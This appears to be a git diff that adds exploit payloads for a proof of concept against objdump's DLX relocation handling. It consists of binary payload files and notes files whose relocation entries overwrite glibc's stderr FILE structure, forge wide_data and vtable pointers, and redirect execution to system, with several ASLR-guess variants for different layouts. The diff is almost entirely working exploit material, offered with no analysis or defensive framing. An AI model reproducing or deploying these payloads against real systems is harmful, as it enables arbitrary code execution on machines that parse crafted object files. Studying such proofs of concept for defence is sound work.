diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..79841f5254e06ac6ccb17b71a461a7cd0c1dff2a GIT binary patch literal 1280 zcmd5*O-mb56g`ufn8a$eMs3pyEm%+p#J)-VC@M;e?V>^i7fKcUz*q&VkQYHw(4XL5 zx2{TmK)dR)KS5~M;RE;bMKkUoj3QL%*?*CQWj#fK3+0TB!g0v(DOeueg9O|Zy)!6Yv|t_`VZuC zuF-i`8H+`HKA3juJobKrOxI3D>Z5d4U{%&>-(Qpws$x8P^#B}CBRNz=LN i{tU94#gG%k>^VM`{4jV#GnJ)yo43C(p1kG3?Ee6;oP5y$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes new file mode 100644 index 0000000..ccba346 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..9eb3932557300f35031e7edbac0dd2f2c7907019 GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&dLYMAcjOWf*#zz-jdf~lu&%I|Z_r1CA$I{znD`g=zYwd)7B4GdZ za})kPhBVq^?Y(kRvw)oeQgeWl@x1eOpiOuaXcs&N(h}bQI>;Y<05XEBK&N1tOYkGm zMYO*GS;6nXL;3Cy=(fqPfSkmC13eP|3G_1V%mR7FojKqU;}^W0K8ZJheu*Cg0}`JG z9;bq<8w>zLAwCK5-@syt|H2M{;824Hu57ze)Rg8v>W$dF!bYwzEoTMlRV#)q33_NbN*K=e)+imqM?6n=--gb zy+-%BLSHQ6?*kfh&XI3HUcZ1=&@OZddII_-^d$5Y^fdGgQ<7$0QJ|<$lqhNxMT#m# znWE06&XqdUxzxFQf5k@ipn>96wX*+tedo)k8jAJm?j5eb?lm?mDC$N%!0pfrd;A}e z8Iu*gb9wnPQ;|h}nt|jza;|X{i4wUyea=4?xWxEg{3Uh#dnR^p$y^8z&0;O FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..b534929662d3c4c5c6dda4d3ebe94454face8cea GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&t(xrPBUU=`^bMKkUeQ)mjvGjJ?N?C}_T05bi2-tu9 z+=Rc6A&vG}d#{|-EMRAV)EwYsJnwuRXcOK9+69k+w8S@n4)O;dfQ;ZO&?#8v68s2s z5$$h4R`5IUP`*0^x^40+ASdzPK##l%$zg6eubbC5jqFk)ldb zrl@nNbEOV-E_E*7U$Id=XrQ=Nt?YkZ-}&;XhGMt`a69zE9{&eq z#$-kBTwcD+RAiB#W*|9_oNF9KqC_rFpYx9eE-}6re@Pwxo{1e?G8e)_vslZzBx&Q~ isQW$0Y!*UJ5VPNLEBkJ+MLm@y*^1kz^ygbV==~P?ynWFC literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes new file mode 100644 index 0000000..29646cd --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..714a463865c3134cc42422f05897ae91321afddb GIT binary patch literal 1280 zcmd5*O-md>5Ph>Vx*ula$C^#lfPn}JEUfnI8Wjx*i1Cnsf(IolXe65`_=UZKVj%tm z?|Stl{(yM$n4b_ZSHWZM9>!PmwPTY*jw$GV^{U zSM~RoNTW5@{#QRIwbxZ=#=RJfhPTaEE@9r}1mxJdw{C`n;jXE z=zEO(QzPGRtwaqVEDDTwQ?{U4q(fG82vTp1IxEgw4kN*NP zW3r-mE-znZDzeB=GmxA|&NYrAQ6g8M&-uq&E-}6re@Pwxo{1SQnG4~eS*&GUlC*Gf i)cqc0HcKHVh}pB;YQ7t6QBM^~Hskgg{nt$%^nM5VzJ1XE literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..2df83df --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..06666223aa853f25e2c88c654b1c1be5a9cae54f GIT binary patch literal 1280 zcmd5*+e#Zz6kU^v#>Bg6)2f9&C|D3i&m`WEVyUzWEm-hD&<8OzUN9QTiJ(vZLVv<1 z?LYYF?F0M*71}@O!?^ZbGUItDee8iVYp=D}?3~%z=j7AZ&sNGpb6KmWj1z+W=;uoQ z^Bpp1ZF>K!AhiqFSs+yf(pk^DssSy+Z-7?8TOcF)0nkR?{s3eJ`F%OTU)+Mffexa5 z26PIZ16}go51`v-?RKDtdb$JX75xtA6MYxRi(Um@P`~a0UW$GL6hyxTUWvX4yiNtJ z>km6P5aQrpJIZ2-|Ai;xNAU#oPT@>GnYi!QpfKzv5i~iLU_0=*0L^0TDUptzF%f@G~@(X Z_BTG({4jV#zgv`Ktjm4I`Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..61582b1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..795cdeecc9b3852ed9fff02a778fa72df9171e6f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Tez(dZ{XtgeD^20nMLWc12gA4=R5by%;cM|uin14VitPC`uL4;M6hqY z+@iNWM+(WF_rD5ab-+#ou?7%NyY5vJNC^p`{TB@Xyx}i3*RP}JD;xe5!@pJ)cfbC+;eTWJH_7E*!~3i< zmJ#yzKJD=j16(gaD`*G01ic8o1icJhhOR)rU`o==D;g9XiWWtWqDj%EXjAk#^f^+8 zK8HSs@2}XZowZQht?iudeL6V$+(hxD))?UW%VBGK2SwdF@o_(hf<68VNRP=3-?_Ye z>8Wspaf(8;A1ma1BfSyka#Yy=co}3ai87^*chAHjPU#Eb!LV4%`bm=DWUG6A>CHmG b2{P<=T(-Q>U&7xlNwTlYd&X*?`+NTbW9omR literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..b9c2213 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..47f529fa79c81d633402a83fc007e97b83963d51 GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Te)#e8@RYV-~CB$W>LEAz|8s1`Of_^Gx_H0tGBPMn1$Z3K7L~y5$szp zx9F|UkwUWP{jY*p9kA0ttO3N+u6xx462jX+Qm_N0L_Y?G$VYB~v>?wnEO^H$_#4O& z?F(R3@H_B8zB>oTY}OtD#;M0Mz=Y^sAS-$u$cf$n9#a1`4m=XQ4NQvO0j5OX0H$O9 z)#Za5oC$FDuQ$qKk^hA|K+?j!!3;h!}8 zc_aVW$UiaiPmTOsbAd{K{{_Q8Z}>~i_3P;Q%7%Z%@UK`*O>(){@II@I zWrX~_Pka2s0M`r93fh4#K`%ltK`%p>p)1fYn36Q}iUvi8qD9f8Xi{`3+7x{beU8+j z&!NxZ`zy9;XDt+WYdfcVpAL>bH&HyPH3qo;a@gA5K~c9(eB2MBV2}R-(ql5icP=kq zdMX@YoT3oz#|k;$NN92NFIUIv*!m+*H>lI-j9p0V2J{@(upW;B1J literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..ada2a44 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d912cc46a01fdb57185e17b00c033d60c17bfbb2 GIT binary patch literal 1280 zcmd5*%}QHA7(F*P8e`O^rdqWH7YY@G)Vc8&DGE{*DnxK0=t2ypRg5NNBG^@5!I$XD z_8naM_W*eTQP4MVaeKb|libWgx^!UXeCK@Uewmqk^Xu!{vK6z?7}nNr#u34O@N$#h zI)((=8{StH#0~*F3B*c3Jn6buWuQ&?4bU!l3nWCZ03GD1dmt&u^K}Y7atb~HT}1mF z=ob6~^vHK-z#E&jQ$U(}ybE|MdL8H${Se5AUIN}xzfJ>vqTc}hqTd4VMPCI5V*b?) z1~)hq;D;A)l*Jk{L=K94hw@&xLme`b&m?#qfV4mwOHGGtXE? z$Txi2;F~R6Pe3bZ2Ra8m2|Wcp4Lt)r3q8k_q?uPVC^{4^iXKIiqD#@H=yT|Eqz-)! zeGcDWwpKi?A-h*Boc!21IR0KnwpuK;aQ*YBwp&0}*Q!452T`!c{{iVSnc+K^moGgP zjxbJ8i1y9&myT Zd!5U+7y3*1yE#cVb$QSD(&YZ${{dz;f1>~Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..2eb01e5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..98a9e31d780a1dbd2586b3370de7ed3e84df84ab GIT binary patch literal 1280 zcmd5*%St0b6g{0zjL|qg;w$5TixCurXmxZ{L=;6wa6n-e12YRzj1P=PtO&aD7yOA? zssG^8*9Z6oGlKqsi}u`prLBd`atf-?J?EajslK^&I{$6KN?3@N_47C5m|#D8xe@O< zfHdkN?|&5}b^$vBB+5WC*rAn%<4%{FT{0xi^&S)f()2cS*#T_7iV8EB_|+X8fmeg|}leh+ksz6f+D{MO}z z4t@-<=iQF7SnPk{$@o!x!Gi0$#AKV#lZ@j$jfcL=SiZsVHyM7O8!s_`&hU2{{=AX@ zWaN8|{AVNIe=sD+jm|%4_=gOCu`>H7?jJM!lZJnK*()E_pELYl4gV6k^fm0~GGkdG z|L)U>|9HdoFtmbppo`EW(4){_pvR!cp(mJjb-X?k>$znvga^xFE$fOT#m!Oo{4$$^0Vl|^ YSNQnlh5jS_-J&FGy4+_>)wqB5SCqMbq5uE@ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..75abf9d --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes 
